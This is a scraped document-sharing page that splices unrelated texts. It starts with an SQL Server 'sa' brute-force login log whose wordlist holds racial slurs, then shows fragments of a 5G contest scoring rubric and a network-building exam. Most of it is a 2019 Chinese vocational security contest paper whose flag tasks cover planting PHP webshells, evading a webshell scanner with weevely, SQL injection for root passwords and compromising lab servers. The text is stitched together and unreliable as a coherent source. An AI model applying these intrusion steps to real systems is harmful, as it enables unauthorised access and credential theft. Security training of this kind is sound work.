(Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed(三)第二阶段任务书假定各位选手是某企业信息安全工程师,负责服务器的维护,其中某服务器可能存在着各种问题和漏洞(见以下漏洞列表)。

GZ035 5G组网与运维评分标准第1套-2023年全国职业院校技能大赛赛项正式赛卷 (2)

GZ035 5G组网与运维评分标准第1套-2023年全国职业院校技能大赛赛项正式赛卷 (2)

2023年全国职业院校技能大赛GZO355G组网与运维赛项评分标准第1套一、总体标准本次比赛共分为三个竞赛模块,其中竞赛模块1--5G公共网络规划部署与开通占35分,竞赛模块2--5G公共网络运维与优化占35分,竞赛模块3--5G专用网络组网与运维占25分,职业素养5分,总分100分。

评分采取裁判打分与系统自动相结合的方式,具体分布如下:表1-1 赛项分值分布二、评分细则竞赛评分标准中,建安、兴城、四水代表城市名称,J1、S1、X1 等代表城市中的测试点,A01、B01、C01、D01代表各区域的测试点。

X1→X2→X3→X4代表测试路线,JAB1、JAC1、SSA1、XCB1等代表测试小区。

1.5G公共网络规划部署与开通(35分)本竞赛模块包含3个竞赛任务,分别为5G 公共网络容量规划计算、5G 室内与室外基站工程建设、5G 公共网络部署与开通,各部分评分细则如下:(1)5G 公共网络容量规划计算(6分)请依照竞赛任务书要求,若计算过程中由于单位转换出现多位小数,需进行四舍五入或取整。

计算结果在标准答案上下浮动10%视为正确。

表2- 1网络规划计算评分细则(2)5G 公共网络部署与开通(9分)表2-25G 公共网络部署与开通评分细则(3)5G 室内与室外基站工程建设(20分)表2-3 室外基站工程建设评分细则表2-4 室内基站工程建设评分细则2.5G公共网络运维与优化(35分)本竞赛模块包含1个竞赛任务即5G 公共网络运维与优化,各部分评分细则如下:表2-55G公共网络运维与优化评分细则3.5G专用网络组网与运维(25分)本竞赛模块包含1个竞赛任务即5G 专用网络组网与运维,各部分评分细则如下:表2 -65G 专用网络组网与运维评分细则4.职业素养(5分)职业素养为过程评分(主观),由现场裁判在三个比赛阶段独立评判,取三个阶段平均分作为各参赛队职业素养分数。

每个比赛阶段进行一次评价,评分时间由裁判长现场确定后,向现场裁判传达,现场裁判集体走过每个赛位,每一位裁判在评分表上记录违反评分标准对应的序号,所有参赛队评判结束后,到裁判工作区进行赋分。

2021中职 网络搭建与应用 赛卷1技能要求(赛项赛题)

2021中职 网络搭建与应用 赛卷1技能要求(赛项赛题)

2021年全国职业院校技能大赛网络搭建与应用竞赛公开赛卷(一)技能要求(总分1000分)竞赛说明一、竞赛内容分布“网络搭建与应用”竞赛共分三个部分,其中:第一部分:网络搭建及安全部署项目(500分)第二部分:服务器配置及应用项目(480分)第三部分:职业规范与素养(20分)二、竞赛注意事项1.禁止携带和使用移动存储设备、计算器、通信工具及参考资料。

2.请根据大赛所提供的比赛环境,检查所列的硬件设备、软件清单、材料清单是否齐全,计算机设备是否能正常使用。

3.请选手仔细阅读比赛试卷,按照试卷要求完成各项操作。

4.操作过程中,需要及时保存设备配置。

5.比赛结束后,所有设备保持运行状态,评判以最后的硬件连接和配置为最终结果。

6.比赛完成后,比赛设备、软件和赛题请保留在座位上,禁止将比赛所用的所有物品(包括试卷和草纸)带离赛场。

7.禁止在纸质资料、比赛设备、上填写任何与竞赛无关的标记,如违反规定,可视为0分。

8.与比赛相关的工具软件放置在每台主机的D:\soft文件夹中。

项目简介:某集团公司原在北京建立了总公司,后在成都建立了分公司,又在广东设立了一个办事处。

集团设有营销、产品、法务、财务、人力5个部门,统一进行IP 及业务资源的规划和分配,全网采用OSPF和BGP路由协议进行互联互通。

突如其来的新冠肺炎疫情,给公司上半年业务发展带来巨大影响。

在党及集团高层坚强领导下,下半年公司规模依然保持快速发展,业务数据量和公司访问量增长巨大。

为了更好管理数据,提供服务,集团决定在北京建立两个数据中心及业务服务平台,以达到快速、可靠交换数据,以及增强业务部署弹性的目的,为后续向两地三中心整体战略架构逐步演进,更好的服务于公司客户。

集团、分公司及广东办事处的网络结构详见“主要网络环境”拓扑图。

其中一台S4600交换机编号为SW-3,用于实现分公司业务终端高速接入;两台CS6200交换机作为集团的核心交换机;两台DCFW-1800分别作为集团、广东办事处的防火墙;一台DCR-2655路由器编号为RT-1,作为集团的核心路由器;另一台DCR-2655路由器编号为RT-2,作为分公司路由器;一台DCWS-6028作为分公司的有线无线智能一体化控制器,编号为DCWS,通过与WL8200-I2高性能企业级AP配合实现分公司无线覆盖。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

2019年全国职业院校技能大赛中职组“网络空间安全”赛卷八一、竞赛阶段二、拓扑图PC机环境:物理机:Windows7;虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:123456),安装工具集:Backtrack5,安装开发环境:Python3;虚拟机2:Kali1.0(用户名:root;密码:toor);虚拟机3:Kali2.0(用户名:root;密码:toor);虚拟机4:WindowsXP(用户名:administrator;密码:123456)。

三、竞赛任务书(一)第一阶段任务书(700分)任务1. Wireshark数据包分析(100分)任务环境说明:✓服务器场景:PYsystem20191✓服务器场景操作系统:Windows(版本不详)1.使用Wireshark查看并分析PYsystem20191桌面下的capture4.pcap 数据包文件,找出黑客获取到的可成功登录目标服务器FTP的账号密码,并将黑客获取到的账号密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;(9分)2.继续分析数据包capture4.pcap,找出黑客使用获取到的账号密码登录FTP的时间,并将黑客登录FTP的时间作为Flag值(例如:14:22:08)提交;(13分)3.继续分析数据包capture4.pcap,找出黑客连接FTP服务器时获取到的FTP服务版本号,并将获取到的FTP服务版本号作为Flag值提交;(15分)4.继续分析数据包capture4.pcap,找出黑客成功登录FTP服务器后执行的第一条命令,并将执行的命令作为Flag值提交;(11分)5.继续分析数据包capture4.pcap,找出黑客成功登录FTP服务器后下载的关键文件,并将下载的文件名称作为Flag值提交;(13分)6.继续分析数据包capture4.pcap,找出黑客暴力破解目标服务器Telnet服务并成功获取到的用户名与密码,并将获取到的用户名与密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;(9分)7.继续分析数据包capture4.pcap,找出黑客在服务器网站根目录下添加的文件,并将该文件的文件名称作为Flag值提交;(13分)8.继续分析数据包capture4.pcap,找出黑客在服务器系统中添加的用户,并将添加的用户名与密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交。

(17分)任务2. 文件上传渗透测试(100分)任务环境说明:✓服务器场景:PYsystem20191✓服务器场景操作系统:Windows(版本不详)1.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20191进行网站目录暴力枚举测试(使用工具DirBuster,扫描服务器80端口),选择使用字典(使用默认字典directory-list-2.3-medium.txt)方式破解,并设置模糊测试的变量为“{dir}”,将回显信息中从上往下数第六行的数字作为Flag值提交;(11分)2.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20191进行网站目录暴力枚举测试(使用工具DirBuster,扫描服务器80端口),通过分析扫描结果,找到上传点并使用火狐浏览器访问包含上传点的页面,并将访问成功后的页面第一行的第一个单词作为Flag值提交;(13分)3.访问成功后上传名为backdoor.php的php一句话木马至服务器,打开控制台使用网站安全狗检测本地是否存在木马,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false;(15分)4.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20191进行文件上传渗透测试,使用工具weevely在/目录下生成一个木马,木马名称为backdoor.php,密码为pass,该操作使用命令中固定不变的字符串作为Flag 值提交;(17分)5.上传使用weevely生成的木马backdoor1.php至服务器中,打开控制台使用网站安全狗检测本地是否存在木马,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false;(11分)6.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20191进行文件上传渗透测试(使用工具weevely,连接目标服务器上的木马文件),连接成功后将目标服务器主机名的字符串作为Flag值提交;(11分)7.开启网站安全狗的所有防护,再次使用weevely生成一个新的木马文件并将其上传至目标服务器,将上传后页面提示的第二行内容作为Flag值提交;(13分)8.开启网站安全狗的所有防护,再次使用weevely生成木马文件并将其上传至目标服务器,要求能够上传成功,将生成该木马必须要使用的参数作为Flag值提交。

(9分)任务3. Web渗透测试(100分)任务环境说明:✓服务器场景:PYsystem20192(用户名:root;密码:123456)✓服务器场景操作系统:PYsystem20192(版本不详)1.通过本地PC中渗透测试平台Kali1.0对服务器场景PYsystem20192进行Web渗透测试(使用工具w3af的对目标Web服务器进行审计),在w3af的命令行界面下,使用命令列出所有用于审计的插件,将该操作使用的命令作为Flag值提交;(9分)2.通过本地PC中渗透测试平台Kali1.0对服务器场景PYsystem20192进行Web渗透测试,使用工具w3af对Web服务器进行审计,在w3af的命令行界面下加载爬行模块来搜集phpinfo信息及蜘蛛爬行数据,将该操作使用的命令作为Flag值提交;(11分)3.通过本地PC中渗透测试平台Kali1.0对服务器场景PYsystem20192进行Web渗透测试,使用工具w3af对Web服务器进行审计,在w3af的命令行界面下启用审计插件sql盲注、命令注入及sql注入来测试服务器网站安全性,并将该操作使用的命令作为Flag值提交;(13分)4.通过本地PC中渗透测试平台Kali1.0对服务器场景PYsystem20192进行Web渗透测试,使用工具w3af对Web服务器进行审计,在w3af的命令行界面下设置目标服务器地址启动扫描,将该操作使用命令中固定不变的字符串作为Flag值提交;(11分)5.在本地PC渗透测试平台Kali1.0中对审计结果进行查看,将审计结果中含有漏洞的URL地址作为Flag值(提交答案时IP用192.168.80.1代替,例如http://192.168.80.1/login.php)提交;(17分)6.在第5题的基础上,进入exploit模式,加载sqlmap模块对网站进行SQL注入测试,将载入sqlmap模块对网站进行SQL注入测试需要使用的命令作为Flag值提交;(9分)7.通过本地PC中渗透测试平台Kali1.0对服务器场景PYsystem20192进行SQL注入测试,将数据库最后一个库的库名作为Flag值提交;(19分)8.通过本地PC中渗透测试平台Kali1.0对服务器场景PYsystem20192进行SQL注入测试,将数据库的root用户密码作为Flag值提交。

(11分)任务4. Windows操作系统渗透测试(100分)任务环境说明:✓服务器场景:PYsystem20194✓服务器场景操作系统:Windows(版本不详)1.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20194进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为Flag值提交;(7分)2.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20194进行渗透测试,将该场景网络连接信息中的DNS信息作为Flag值 (例如:114.114.114.114) 提交;(9分)3.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20194进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为Flag值提交;(11分)4.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20194进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为Flag值提交;(15分)5.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20194进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为Flag值提交;(17分)6.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20194进行渗透测试,将该场景中的当前最高账户管理员的密码作为Flag值提交;(20分)7.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20194进行渗透测试,将该场景中回收站内文件的文档内容作为Flag值提交。

(21分)任务5. Linux操作系统渗透测试(100分)任务环境说明:✓服务器场景:PYsystem20195✓服务器场景操作系统:Linux(版本不详)1.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;(5分)2.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件名称作为Flag值提交;(7分)3.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;(9分)4.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;(7分)5.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;(9分)6.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;(8分)7.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;(11分)8.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;(21分)9.通过本地PC中渗透测试平台Kali2.0对服务器场景PYsystem20195进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。

相关文档
最新文档